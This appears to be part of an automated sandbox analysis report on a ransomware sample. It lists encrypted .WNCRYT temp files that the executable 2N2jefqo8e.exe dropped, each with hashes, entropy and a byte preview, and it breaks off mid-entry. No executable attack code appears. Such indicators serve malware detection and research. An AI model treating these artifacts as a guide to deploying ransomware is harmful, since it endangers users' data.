                                SSDEEP:24:Auzxri7UdDOds48v6690d1TMMAomuk94hp/BrSqv:AgxcUdDOds48v6H1QMAak94hp/sk
                                MD5:E26B4BE7CDC6F8B85DC2F594A4504D3E
                                SHA1:8146317FC26D09C9A6B38BD4A7EE71D7CDD7BDB6
                                SHA-256:15B1BF1FC57F53094DB35509DB8EFDEC15A61C11D8A914118317A36B08DA8E8E
                                SHA-512:CC75E1F4B5B1179690F452DEFEAF7950B52CDC61DF10F619BB2A9095469EDB6DE6F993046756AC77DB0446CBAE70ACB2DC96572EFEB39DC17EEF1F9EC5E16BC9
                                Malicious:false
                                Reputation:unknown
                                Preview:.S).#......=.~...Q9L#u..........p.\....._.K...KA..=...C'.W.D...VEdx.A.*7.G....%..4f....3..Q..Bo..x3%.,....A.Q.hc|..W....r0P..O....M.....%8;1..7-..Nx..........+&:..yc... ....'X.'..3.F?U..........]@8....:.v...5=]..H.....,*b....z..&.>..\./.{..{c....[b.p....D....J!. ..l..".....~7M..kcI..........1-qQ...m.*..v...{M._.....G30.7Z..`...ul.Wr..v..W-.......Z.....<tl..{..{.W.[1.b$O.....I.1R........mO'.....:q..A.W..+.....+..W.. .V."..Vx./.gV....j...X...F....J..*..~jq.WH....e...W.""h./Y....n...&...,....x.d...|...4d|e.....BM.ao)[.%.....%.......Q...FJijE.W...\..&.,J..;...4.....Y\b].>).c..a..P....!Z.!..0bnW..g."P...~...x...=.CB....c.t5.JY..9...'B4.4.%..@"..*..~%,.....;...,+M.....m..........gu(..l...w..KV.G..c....=)r._`....{.5TK19...}c....]{....M].....a......t......_....p.+.z...N...,.$ij...TF..U.^.AZ.._..M.%.....)..T...]o..^w..QL.N...P..q.V..2L....r.6"...`j.k.YY..uPX9a^..U,...D}a..rR.;...(.>..&Y..^.+...S......J..a.x.<a.[..u.:......H.w..eC...|.....g

                                C:\Users\user\AppData\Local\Temp\48.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.81044533136706
                                Encrypted:false
                                SSDEEP:24:k2tz1RMHRzEvgcCSUVP5tz1BujBke7ecSuv1H/V3Vfcp9aMiYI:k2tz1KHFEgWUVBt5BwB7UuptmpHI
                                MD5:C6D59EA6F66DF54A959A4E1109AA7AD2
                                SHA1:EAA7B5D45F760010447102697832E78847E48C8D
                                SHA-256:50F3E2C8514E0730D3D8286D225964F5A9F08B64AEE55A4E3317D91B0153EDF3
                                SHA-512:6C12864ED7687E2D1F9EC88DA94D5E05D7128AFFF416A0848C6E9BA096E7E3B4EA1A209121F61AA1A711CB015A4D5784794F8E0F49809AE2505D1394283D5A69
                                Malicious:false
                                Reputation:unknown
                                Preview:rH#.+....K..|...O.tw...|0..v.?.1p.~s.E.<....03....!.......w.s.zn.X.....wWsb0...o...35SZ}&.L.Ic"..?$.!...........[....*Ww.+.J...>.>A.l.....)(..QK. .j.i.S.s.....Pf}.b.....{.UM......D.....1!#;.^.#U.48.5.5..j...1.1....%M...Q."B..$5x..d>..&.../<z..<....L....1..X.R...5.`.S....>oY-...,f'.. .X.6Y.5g...*t=.1E...m...q.W'.C..o...u.....Bm>`I=....}*!..~W.._..D...<q.,.R&^....gU..Fg."Q`..n..AF.5..Lc|[j.C.2[1.>..eRD.U....Q..gp.6tH.&.G..#.]....U.'.Ot....{..R.K_..../Vjh....r.~./"<...UR..$...e.bw.....~).p.N..a7n.....%...,...,gr<s.....t....."..ZY.QD.U.s.=..|M...=.0..p..z&P..[....mQt..9...J#[.A._&..X.,i..u.e..c!uh...F......l>S.l...~......N..%.............U....!-.......nN..q..X.e...I....:..a.;......v5!.|......|.[..S..m......%....1;&..=v..E....P..q...fG.W.*.-.....oa.;.....h[..].,E$#J.+...XS.k....tf'&....B4.....3\v.k......ZH.?.q)...lo...3.T.1....`.G..%..>...MoY6V..7...hb.>k&....a:..C.s.E...R..K......:F.un.D..Al..HO.......;.j.........bI..j_P..<.-f..T.

                                C:\Users\user\AppData\Local\Temp\49.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.791705065444209
                                Encrypted:false
                                SSDEEP:24:m2Qs3BAXp3BN56fwMEPJ5IgfeyzEbpkbsizYjzYHFMD/t:BQjB6yPgVWtbsizYjzMK
                                MD5:026E47DF362D058D7F1699C9A42B2D4D
                                SHA1:3B9A8CC4DA2FC08BECFC340133603F6432DF1B2D
                                SHA-256:E0C6E25B1EAC4B65C79D311E5531DEC6FF7E61459C49731D1AFE739576B8EC98
                                SHA-512:17AB69ECF626A050DAE4AF0A190CB56C8A79AE8AE5FD784443879EB2652833CA691AF8B009BBEDB01A7840BF7C4ECF0D9270287CE3F7A8166BD51210C158721C
                                Malicious:false
                                Reputation:unknown
                                Preview:3..{..5&.^T...)vS............o...>... w..l..l.y..`....;....'.....ye.q(......U.Y....r....X~.u_.{.T.+CY.h.....%....=.-z+.I.:?....XhB.....X.@3.rp.g.I.L.l..~.rNf..8..|A.OI...M.........oD...h...S...2.A....B..U...........C...e.C..h....A..L..C.T\r...)?.s..+..V..........1A......s.p....|.3.6.....OT6.......1....".Bd|.)...?.9.....Q...um...zp..R..P.b.z.?....p.~.KQz...`~..O...|...v,d.3....<.._.".7...+...ra.^q@....]..F..[.F.+...8a$.}.........l.$.}$.f/VB.....U.V.y36...5....P..F.Bz..1.&..?..)9.i$Gg..K.L......~................QH.[..K.n..o.x.E%..6....(..@|.$0.:.....}...$...Tr......e.^.Ip.s.yaw..:.. 8(s...ON..=K.0..K.O.~.I..\w3F.z.uqU......].........J.`..8.a ..~.....[.UZ......Yf.;.X.A.f.&..nDQ...........m......b.i>...V.+.3. .t..._.A..bO.Me.PS.mV1>..'..?..}.ng.*.....-..,!..j.:...I.:gZQ...g>K.8t...v.x.-2.......t.&H..m.'.LR.^..%w...JI...0....N. ....m...M....jY.j8A.....=..QC."..'.gH8.>./....8.C{E.+a.5..#Z..@..N...T(..oywi'..0N..Q{0[O)..u* ....I.\.....05

                                C:\Users\user\AppData\Local\Temp\5.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816404250179475
                                Encrypted:false
                                SSDEEP:24:hu0sAkfN4+Hjm5Clg6YE5tu1nNlRsWI6VTBcIAzpYf+MH:sXAuN4VUD/uNNvxI8BcIipwFH
                                MD5:E4E2F5D8264B4F22EBBA1C97EA3CDDE8
                                SHA1:6B29FD441DA46482FB678064DF30CA02552B2649
                                SHA-256:C96C01252679928957458EC0C9C65DBA703C7590AC8518A821C71A735EB610D2
                                SHA-512:ACCAB9869BA89FB976BD7A4B5B7BF7C27465AEFFBD075BFF0BFF27F7E47751F73B1F9575101AAE293A960ADA5659166571DCC4EBDAAFC039598C9A9A71CDE78F
                                Malicious:false
                                Reputation:unknown
                                Preview:...I*..@........;..*GU..f!d.0.{{......?..v-!..09{7/Z...X..bY.....xb<...w......yd.7>...3;.tj.,8De....G...U.NYf..N....I!87[...i=...V...*S.....Z<.2.D2..W.[.........y...\..=.)...;..v?...0;....c..%.....Ci..$..ty.Z@..t.[.*...C`.6........,b......E...7]..E.3e..!=..8..r..PX..u..c...c..9m<.vaD}...p..0...Q......D...k.gZ1.94. .C?C*..(Y......~.V.S....|....RRp..:i.6.=u..j..-...>.4.W..L.gk.}.rQ.>.....C{d.I7J...D....>...' MFC.......{.R=...Ku..P.t.....9.H.....g...V.\.d...d....S.../....<....R..31}>...`z58.X.k.[...~....P.........X tBB.C..n2.T#......5Ot4.k.E...3.}..J.%8..i...L/.] .DN.t..sq.Y..#..........5....oWw?.7{M1.GE{C/.l..#m....[r.4........WfL...@...uD.H/.z...*...M..U.P........,Eg...g.J}.....Z..0I.y.#.5I].d.^/.V...6[...W..2Ub)A....BM..j...J.cX..N...L....1c"A0RA.-M...2....=..k.....c...O.i.>X..T.gk.n......d.5..2.s..K.^...1.BZ..!m.k:....8..E.1....Ba.$..y........}...)R>^..%..A.B./=@...s...E..hrN..(e...1.L&.<Q...(.>>..!.(...S.x..".....d.:.8...H.s.S|..E.

                                C:\Users\user\AppData\Local\Temp\50.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.773353073231738
                                Encrypted:false
                                SSDEEP:24:Ze2JAWzz9RCj7S1Htdq57aNmqKm7EGVlJu/:Z5AW9QnS1Nc70K2NVvq
                                MD5:BA560958B10E5F1271D32CD2D24AC5A7
                                SHA1:292E4C1AB3DDC84EDE281FB2AB65778661615F1F
                                SHA-256:AF79515BC6AEE189FDD5817D1C9692045E836B19F1CF244E8603A348E5ABDF5E
                                SHA-512:CAD7BE9D1CF2C93A9F4A92420D3AE6F101819B54FC23F0FE081283502DED9FF503A21F9D7E950E1A8A2505917FDF7291D682D4F777E545E906FB2BC5CAD6E37E
                                Malicious:false
                                Reputation:unknown
                                Preview:.....[@av.....T.YqW.....o-X...........P,.:.5nl.1....c/.~...;C[.Z^8<1|&....yq...8p.....~..{/.A.b..fp*6|.S.....(z...&.[..'.0.....1.+&...-J..H....,...Gg.F..4Yq...#YTt.K.....3f...|9~BI.....5..l...D'....6...........${.w%.1...%.nz.$.J.....i.DP.<IK..Ih#....<...{.!.3....x...vn|W..9.n...........'...H..X........qI..Z"...6...g.8..~t5..m.#/..Ch...-...p.Ls.....f+zs?!......P.I./..?!...-..j!7.0p....y..Z3.US.H..>........y....e..R.[.....qx.Sg..[wo...W.4^.5.g.8.X...<........i...M.}G{Y.q.+@M.../......B....%..MI...h...l.*..{z....5s.$.M..(...v0U.@....i.r...rD.....}..>.......).e.b/.5#pU.-p.R+<...;.V..F.M.1.c.Hn.C5....f).x.p.i.....RYi..s...K..7.y.=.^......@@OR...........7i. ....q...Ix.ozq..Hg.1........`..f|.....l.(....".""O..l....2i{eT......\.T.....D.'3..A..ss...'.._..a..m...+)..0xv.8..],...|P.k.f_....`8..U...*..k.t$.|lK]..}...L\k #6sX.y...1....mF......nd..q9.A.}....*..l...`......y~..2.....,....1..k.>.....$...jY...|.?.k0{.6...F.Tl..%E|...F.-..H....

                                C:\Users\user\AppData\Local\Temp\51.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8053895262141735
                                Encrypted:false
                                SSDEEP:24:/oGygW4vXQ2dfaiZbLfhWLRTvkZ8rPhktACx3Q:FrhNZbLpWNTvk+h5
                                MD5:3B13ED3F0883F7055D33AAE104565A27
                                SHA1:652B535F7E9FB1B90836EE4DFF1B84A689BEB52D
                                SHA-256:FCEA2195826CCE612D914A97075AE2260EE1E1BBA70F4BDBAE48174E2676687F
                                SHA-512:5D06B1D327DFFC8B8B2E600428BA516F2F388B8B59833A97F1F653903982017183AF65C5E6EA7ED15001BB37D7A7B061F3EA35615B82055132617C2AEF638E44
                                Malicious:false
                                Reputation:unknown
                                Preview:So/Dc.Y......^..I.].,..$.....P8..F..N.....~e...l1.D.h..\.]>8.3.'.....t.>.~.1A.,. !.....v1...q.T..N.6.S.y?j..MOFD..O.fh3x.....G_........I#/R.AEr..IJ.......2n.bm.D{..pY./OE.'.......[..R_x..iz2!..].W1...H...b..O..-.5.....2d.\..3..3?..}.\M....?6..&..Q.._W.O.....i..1u...D.....x...=.g...........?.(.fN.qR,.......R. ..Z2..........#..t!=..T6N.....#..w..O...m..]. Ecl.S......F2y..:..j=..Bc.w.9.......XW+d.sB....#S.p.A.`..xX.%.|....P...$[ ..............G...h.....-..D@...G...0..X.....*?}..m.&...GTx...K?oz.T..H..\....j?c..C...WIsN|E.-Z........q.pA..8..B>'v,..5E....h.Pu...../.Z........W....l!.....#.k....u..VI..J`... ..99..?..'.5...wRo.rm.Ys!h.........b.nB..,.....>X].....}..<.....X..?.. Z.p..C..d..O.v..W..3...d..}......[....@.M.k..=Z..U&.'hV.b...R.l...-.[a.u. ....g..a..`u...+..(]..q.>z.A7..+3.n.eU......z...`:ph.D.....g....{.'n....'.E...X8.<.........".k..W..l.....O..5..W...Zi.a'.._.A...t.5d..G\|/..U.......v....BU...3o..s.....{b.5.+.....}$....l...m.6.

                                C:\Users\user\AppData\Local\Temp\52.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.822754322988812
                                Encrypted:false
                                SSDEEP:24:0nfVXGNl54fCDKx/mEbdx+01otNOlSeugvvXrEo5J1EgHjU:g9GNUfAAmEfi3euwrF3FjU
                                MD5:36466F0FA0120C2105B14A413842D3A3
                                SHA1:D7F2DDEF5385C4FF50012063761809EC17DF7AC4
                                SHA-256:AE8F6B606CCFAF1639FE090B0B1CF08455F26276A2DE37234D7CC693D2770404
                                SHA-512:CE474408CE2B3F134147FD07B525819DD868F54071CB50A968B5EEDC9AB3E0AFA5AAB5F882E1EA3DDDA3C891B53132F9D46C27AEEA9F002CC4621765B7E2DDB0
                                Malicious:false
                                Reputation:unknown
                                Preview:p .0....mg(..g.../.....j.8..0...d. U0..../..-[y...K.!Bg.....a..A...3#Q.%,?.9x....6.5....h:L>.<..".6.#..P..Pq....c...Z..(.m..........M./......w}.uY...K.z.+&.....f....\\C#. ..W......s...vW.j#..]@..!.......i.r..+GK.P8...'v...kr..$(..)|c&.cb.r...ZFn...dT.....iV..].U...t..##.GA...".........#Uc...".....-...<.M..r..3.1u_..(A{..).....,.!.'.7.K~..M.C..v.N..?.e...u.!?.]..-)..g..... l..=;.@...?.tH.......<m....5]..>X....m..a.......B....+S.kg...*..{a...nS.*.....mJ.L...b.L.v..+.."Z.29B.vjx.|....G0.E?c.6\..$..u...4I..K7..xm.......om...TL*L...axl".z...d^sH..@.k..g..#.1...L~$..'.....m..O(.*d.&.0kX.R....*UYC...a.N..9O..&..g..@C.U.e....'... ....Qf.........\.n/.....w......F..DK|.L....;..Z.Z.'.=eT.y+..W.G\..TY#~..J.x....D..\..qT.v..F...{'..(..A....:.9..x|.6.t.....X....O.......... f7.J..R./r...g8.H..[....9.9@.b<.b...q<."...(...:..f..........h...B.m.].L..2.......z...zlk<N{...).@..7..o;.%R.HoN^...N.......J2..K...7E.E..a....x..p:..R..S..,.l.D..'..U.a.Jk...7.w..

                                C:\Users\user\AppData\Local\Temp\53.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79990850733804
                                Encrypted:false
                                SSDEEP:12:fOli7oYF+J9k3/EeO4Ux92VgqIkD/DNKHTfUrtT//O/ifk99p9kCnWpPWNblYO9X:vgJUUx92V9x7NYfUr5E9LxnIPO+cogLP
                                MD5:14D3AD8D0532D8AD5A9CD3EF40D19859
                                SHA1:4B6180A428665011F6DBFBAA6879744FBEF3C62A
                                SHA-256:B4510AC19BB462F42F262C7F242291C47E6A953340DC886DD2B55D08AF6C928C
                                SHA-512:A13E313051DA3D8CD3D84C9114127BDD730A6702C3430D1ABBAD79B37CF7C358979FD33A89FFF4D5F48CDF05A5310CE0FFBDF50F6C00AD3AD32E654284BAFF42
                                Malicious:false
                                Reputation:unknown
                                Preview:...B..._..$./.S....F....P.(.].ZZ,K!.f,.......h..q~..yS.........>..../c B.d.....|.2..L..F...S+..K!l.......%...........K.i.9E.f..X..Q!....?&Z..=...S./..........V.G.4..].99rfUx...ZH..$...b.X>i..(IJ...[......ax...cw.1..v.zT1...S...>\.....Y.. W5x.f..c'b..k...F\...^k!..Nc..P.~U\&....E....r.....:na....G......}..l.{X...b.m..:.B.f...;{....Y_i$r....gT.\k`...t..[.b..I5...g:v..n.X:.v.F..P..?W......3Q8s..>oF....u.x....q[H'.u.Y...e..Iv../`...E... ...5....|..lW0..=e.z.,...=....(|.#.^...Yjj~.m.S.8.+zb!(...^......i3......D$D..='M..!vX<.l^..K. .`.m..{<...\8....8<Q.*.Et.....]......CVTxU1a.Bkx^..(...dK#E.........N.i...2Fvg..I.1.9A .E.MwS.$M.g....c.U....JU.....y.P...^.[..G....He.o......v..8..{...Z._...|B....e..W......t...4.#!e:l.bcU.qV_.......%.IDT&..g.#...[@H..N._..y.(...hpMZ..b.2.. sBG...wQw.yF-.w..+:..+ss5.cp....)^t...j.N[......CD..4..i...bp..}:..P....._x...m...l.^E.:.3}e5.............t..p5.+t..vX%8..L......b..O.O..{W..2<N..~..Y.......z ...A.,.r.Z.(.U.

                                C:\Users\user\AppData\Local\Temp\54.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812510169906532
                                Encrypted:false
                                SSDEEP:24:iZNp63WGf00vopI0xqXho3jlNNyiAqwmEz1U69j6KKhtwc5pGTfFnKl:mmA06I0QhozFyi8mcKhiciY
                                MD5:2CAE604FC32C0B3BEA46A3D93E6B7563
                                SHA1:472DEE997DEE4E91646AD395194C3BE7702B0C84
                                SHA-256:551F003F0163425459367E6EAEF6CACDDACCB881A7F5A006450C4CB3D4956814
                                SHA-512:56BE5B0BEA246170D7FAF6FC8607A4D1399FFA0E0A39B0BEB871F43235C8D5FBFBA2C080590DBDF2661ABD2E85DA91FDECECDA4276073177FB249081E1520105
                                Malicious:false
                                Reputation:unknown
                                Preview:_h.\P.1o/......g......1]R.....*lF1f.qY.$".....w.......;......4......-..@r..`....[QT......`t..E../.nDQ....]...}. [..T.w..q.c.r...ozk.....^.^.l.r=...V.xB...q.T.y.}.I...@....\#G.r}6..Ox../...3.k.e......MB.sn.i.5....'....... p7.u......$...B..*...X.\...p ......Fp....*XO...g..0o.....L:j....rOT.....h...C>...G..)..6.u.K..F...Zr.h...;..2@A._V....Bk....u....a.1;.6N?:......X.kB....%.....2f.O.)...Zzl.+......6..{G.*&.. f.7^...m.P..q.."..~$PN.a.~....p..D_.]q....Ln.-.v.H.b.0..n=...._.<8..T_f.O.&^..Ad.....I.Z#hr.dG#.Y.....r.oOc..F...5<)..".93....U..e8.E8J......MR. ..w=.G.,dQ\........B.!.....x2b..J.....v.......6..H..+.I..e....Zr.A..9..2Q..B.l..p_b.q...e.y_.7BU0.r../F.g.S...e#0\I......_E.....c..&ha.D.9\..7GH..........-.%*I.To...\7..M..CN.._h..p&:;.a..-......n$a7s..r...X...Y..e....>.#1.........x....F.L..DUk......+.6.......U..m(%..r....6...I%...H-.........5............9...m...>z.1........p-..E.8.!........xZ..v.........n.f%.<...&.g.|..G..g..p...F......f.W.)...0.

                                C:\Users\user\AppData\Local\Temp\55.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.834630839303821
                                Encrypted:false
                                SSDEEP:24:4zleeHINVtZY380X/wwoWFmAtVqIxBrHmJmWEKQLmu6RR/woNSCDJdQfuY03:4Uj0X/wfWdfNxOUmu6RR/dNSaQTA
                                MD5:6D1A9B633A713BB8DD49DDBF887208D3
                                SHA1:7979261F121075636AB75991BD5F49D9A7F832E8
                                SHA-256:8B12B79139D957FBE7C546F2DFDC49143B8921C5D741B8B17457587257221369
                                SHA-512:01B9BFB7ACD99BA38D8B135C9EE5AFA7AF045F9FAD8032BE4DA306D98D9DD8DD60DBF6F579D01B29F255BE6576CEB2FDE1B713802374BBEAED2A07ADD8D39321
                                Malicious:false
                                Reputation:unknown
                                Preview:...3...1.&D...D..]e....T....Y..K.g.....\.F_..qb`.).........6...rn...(..&...........*.......B.V%.HE.j.I.y*...2P.C....c..e%..d...+ny...&T].O.QpPq....E.v.c.K..cnJ.zT...{..Q?.^.3.M.K..m.c...-^w,.!58.-.48a....5....8.l.RW1..P.y.B....e.C.]."g..Qu..M....U..$c*U]3..R.pN..3....K..K.T[0%*.Y..;(...3M.X<..J....JB8..........fx1..._.G.N%...)...nY.N.2. ...D.%.r...".FD...S....x..Z...8.v.OSi.2Ys...@.........d....KP..`...x>.....Q..sz..L.o.>:f..V.lC..;8..#D9)*.8(...*C.u..\..6}..Q.g!A.,...R....<)..|...~X.7.R....&..s.O.hS...6..p..m.f.(..2.A.......?.$......o........x.Y`Gd6.Qu..P...=.a..~>..EP.3.H.;...../.4....<..@.k...........0FB..E}..'.#.......p.p.%.a.. .Sr..e....*.l.f........k...i./....^|........R...%.?...g...7`.k%..L._.G 9.e......g.v..g.....H3.GF..E..[....ON4.[.*.5j.E.......F.I.E..#:V.04_wl.....n...._\.......:",....r....iB%&m.K.+.J.(e!.\.C.ei{L....=?n6..;>.{.cYg...G.L...0...>..;H.+...p?.FX.h.^.....&J..u.w....!LbZ....0. ...F;A.:.I...5<.~.m..mZ.W...Y.()7.(

                                C:\Users\user\AppData\Local\Temp\56.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.789419072134636
                                Encrypted:false
                                SSDEEP:24:lqKaLbgq9hIIJEp/klZOCkx0rPpskp7Cmzla50Sdez:Gr9R4/kltkqPpRp7Dau0ez
                                MD5:6437335334D51D32EB99950C36DF30D8
                                SHA1:0D2F5DA061DED83A3BCC250AE948F54C77DA1B7D
                                SHA-256:A0BEFCEA6C4A39A94209D58B56D04AFF2402BE873483134E1BF062C1DF0DAF97
                                SHA-512:44C02EDD0B86BC7BA6F5CB7DAAE4FB0A63FF33D08C86C0B58C60593621937D1619B460115EF949DFC3F7955C1350A09F52D63C43237733EE7C97A128C4C51F38
                                Malicious:false
                                Reputation:unknown
                                Preview:@..j.f.?......%..b..........U.......*.O:B~."!}......vN..jjF.......ssND7.E....T...x..U.'Y..7.}}.*Z....j.g.8J)...^....*.`w......z+..o..<.6..Eq..8.#.QMX....>...u....P.l.e.....t.h..X....{#.e..X.8}...K.....D.G.U!..<..K|=].J....ic...........%...g.F.I...M.c..l..A. ,3..0..A...[.....).c....F.9vR.c.z....Ht.h.u.......&.v......4.......U.z..{.V.....AYa.S.b..Z*......2}g......8.......v....>...Gy...L/..r..2.0.....+n....\........A...N..O_;.T..3..ztQZ.m...6sNO....3..Z$.8K6.:...s"A....=.&.U.%..![x.*N.'....;/.).....Z...8..ve.'L.r..:.......w=-6...D.k...Q#..:.W..`._.]..C.N...9`#....B.EON-c..[..N...B..S.ru.Wy.k......`.hD...../(....*fr...".se..*.7GL......Fp.a16...4...K-r....L....&.Bn...U..?...ff....i..'b....-.7,..Sw.1..#.:.q$.E\.......{B[....N5G.G........,..)..c6.K...0 ..\........^ ......-X.l.^..$.A..L1...]..HN...A.TGx..T.y...b.X.'..Z.H..m..?.j#.......#~...'^.A.Re+../.Z..o....Lf{..]$.X^....r.g..$s...'..5H...)........./f..e.....K....o.Q.../.-,0..k6.G.].

                                C:\Users\user\AppData\Local\Temp\57.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8221701534957955
                                Encrypted:false
                                SSDEEP:24:uCNLkPkdzyzppdZ2bhADciSZrVLASlY0Z:uCikdzag9A7SZrxVlYA
                                MD5:4AB796DF272DE32804D29D9C7379D42D
                                SHA1:7DF1C46B8BF13F8012AD5BECD36D825F32562052
                                SHA-256:4B22DD81C18186B239E1D7B899AA39A493E41B1C56C5646B3C2E25052A3FADE0
                                SHA-512:10B1BE77B3A8CD996F3F585208B28E553C5C1688F26531D975D3B8F3F374800AA444C00DD2A44219CF7E86FE010C82A1CB2B136CC3F68E8C86CE7DE74AAE17F3
                                Malicious:false
                                Reputation:unknown
                                Preview:W....8.#_.V.]...t.ym.Z...........Y..(7..j#.c..6...b...}n...P..2.2~..e;n|]6,CA.....prL.{!....6.........%...a.E...Q......n...d9.._6m..jo*...1Ei.`c...<V.'.)...I......Q.`Dl...y.A5..8...^....R..........D34...~9...."Sfk..r.%...x.;.D...<...].>....A....y...IE|.K.............>o.v.a..B.6.W...L.q.Mz..........:pI..h...(.e...S(...,.v..zi.F.j..`.........7.}...m...n2.A...nK....o.2D....N.9.s....6..a.v.D).#.... U..@.,.D .wX.=o..j.G..`...G.g..9..z ..Q1.G.5)5$s^.......=...:j.=.[(?.7{.7........./....B.......\R...f..!`....7..*|..H...c....`..S.)Y?.;.|V..^}E...{...:H.....1.?.$NX@....2...Y..*..n.....tB.....`.X.Q....|.{b.....O.X...Q)c.p....b ........mN......D}...&.JN..f\...NY../.f....moh..r....A...l.^.>..W1.G..&...a.....2...H...(Rn.....F....K...6......A.....E.$.6*.2.[.. .<?z..1.v....G].....A..m....;..9F&.0`.mgv......'~.n]T:.......4._... ..g....-Kd.&.l*..m. ..[....L....R..../.F..:u_..(....[.G.L.XV..u.n..X9....0...p...I..0l..}]`...C.0t...\+h.N.KTy...{5..V0..

                                C:\Users\user\AppData\Local\Temp\58.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7698050218739
                                Encrypted:false
                                SSDEEP:24:RTUNDJVyJG+Os7xGq7IB5Ik+RLaW1zJJVw2H:Rqy4w1tawFjPH
                                MD5:2B95D8A00100E7B623B138C132726CA2
                                SHA1:70FBAF237B427DAD02CAA6CA26340B098F9BE387
                                SHA-256:2B6DFF11D47FB42766AE1E4CB48A13634F5582E9AECA78BF98C4402225B4B94D
                                SHA-512:6A9E821E53F9D3E7B16E7CC30FC95404F90A402E7C85A89C516D4F6B0965D7B53FA99DE28107600EFEF21581D12EB37A7F7C91AA7551B010BA8709C648368C3C
                                Malicious:false
                                Reputation:unknown
                                Preview:......"...jW.....u...f.@......1...[.R..Q....g....uX^.hKL.+..F#...O......H..QK`.U...z.....v....y.S .L..0.'.XKPt..6..DQ.^...$.6.4....t..1ba.........]zl?>l..........{c{:I%.uG.....P.....Y;A....9......2...%+p...g....L.. f.(..2R"..h.x..O.%.(.aO.l.# ..p..........~.R....y^.....j...*..9...``.h..G.[....Ow|.a.{....?......1.[...r.k...9.....w...|.~..Fnl..a...2..C.b%....]..*..w..@.........|...rmD......O......}..jp..A.~..R"a...])G...x...n..ji....a'.R.nS..&..l6..S?.....MS[]zD\..|E.h.E..c..?.............d..&......R\..u......h...{AkI.fu.....Z..'...s.......g....%..r..).LT..cw......LtR.0..R..}.#...!Gw.FQ.B...@C..x...y............m..b......?.Y.[.R".PY...~5...O....d...d...a.......f.d.u.!.I.k....|x..n.3I.....b..6#.......J..J.DOV.A....=.......ZL.U..'.....(.g.'d[...7F..4.."..-&.......vO.h.?.;G.......`*!r.U..osB...;u....U..Sx.`&3v^.1.GE.A...... .`|.1,...z.b.....wI.:.....==..VN.iX.5.2......j....Rn.F..\y0PG..6.Z.....)..2.;.7'...HL.Z.k........zAQ....1.m,f.

                                C:\Users\user\AppData\Local\Temp\59.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.833426527863054
                                Encrypted:false
                                SSDEEP:24:PtK/RyPrlQ00EpkwTG4xw1v4CWZceDJ4ahAx1Kj14hZIc45Bvsi:P0arlQ/Epe6wSZceDJ8x1KZ4Hu9R
                                MD5:2D0B8257AD7B0279A7354DEBE833A3B9
                                SHA1:D86E905E8366A4D5615CBB0F2F90F78760F143CD
                                SHA-256:8EE8D2735750FE840E58C14D8242C3F9799FECE1768016F0C29473C9AAABEFF2
                                SHA-512:145CDB125516C1A24D4B63B1509B503DA901EF05D303F841E6DF20D935DEEAA2446070C38C91A6E23145B30443D2ACE1A4C92D2D7EC3C2FECF03D0F057425D17
                                Malicious:false
                                Reputation:unknown
                                Preview:...)x..z...u....q4.R...-b.^..(..'k..D...Ad..B[.8..f.1BE.g....._.C.G}|.......BAg.......Z.0..k8...&:~..'..;g..+..|Nd.@..........fk..........&.{B.\.....Q........q.Z.su^..ZBSO...=9.T.......)I...z.n.G..S9.a...m'.*.....XM.....m.n..Xe..u#.,.V..w.y.;..B.....5.z.(38+...Lbh.f...L...=..u......U..u?..=...........9r5....Q.\._....a...Vx.4..i.A..c.."....knp.O._..mi......z.#.F+.|...m7A%w...4.l>.k'.6.......xn.....J.A.~I.v.x' c.+;...=C/..+yT....1......B...q.Is...)o.......*^....5e..1.>.4..N.........W.F..`Q....d...G.Y.....g[B...6*...._`!L..oQ.M.'\l.J...q.:....N#3.ry..dg.eF+.&K.qG.Q.B...en.z..\*>j..4/.&.....e.........N...?.R.7.&....Vil.l_..m!....|l1.....:. .:...s..2..v.,.......#.._\^.J.77....Y..B..l&.#.x.......].e......f....i..=E?.7}.^..G..... .....C.;..H1..;?k.#!t....T..... .P....w....D....R........3.P.I...../..\.[.....=j..'V.....(.E..1j;.C...2zu.t....m...b....A." .}....+.[..FJ..>..........{#..srCP.............NN.pAW"..R.S.@{.k.7o."..N].)....M..}..X.`

                                C:\Users\user\AppData\Local\Temp\6.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.83846907899383
                                Encrypted:false
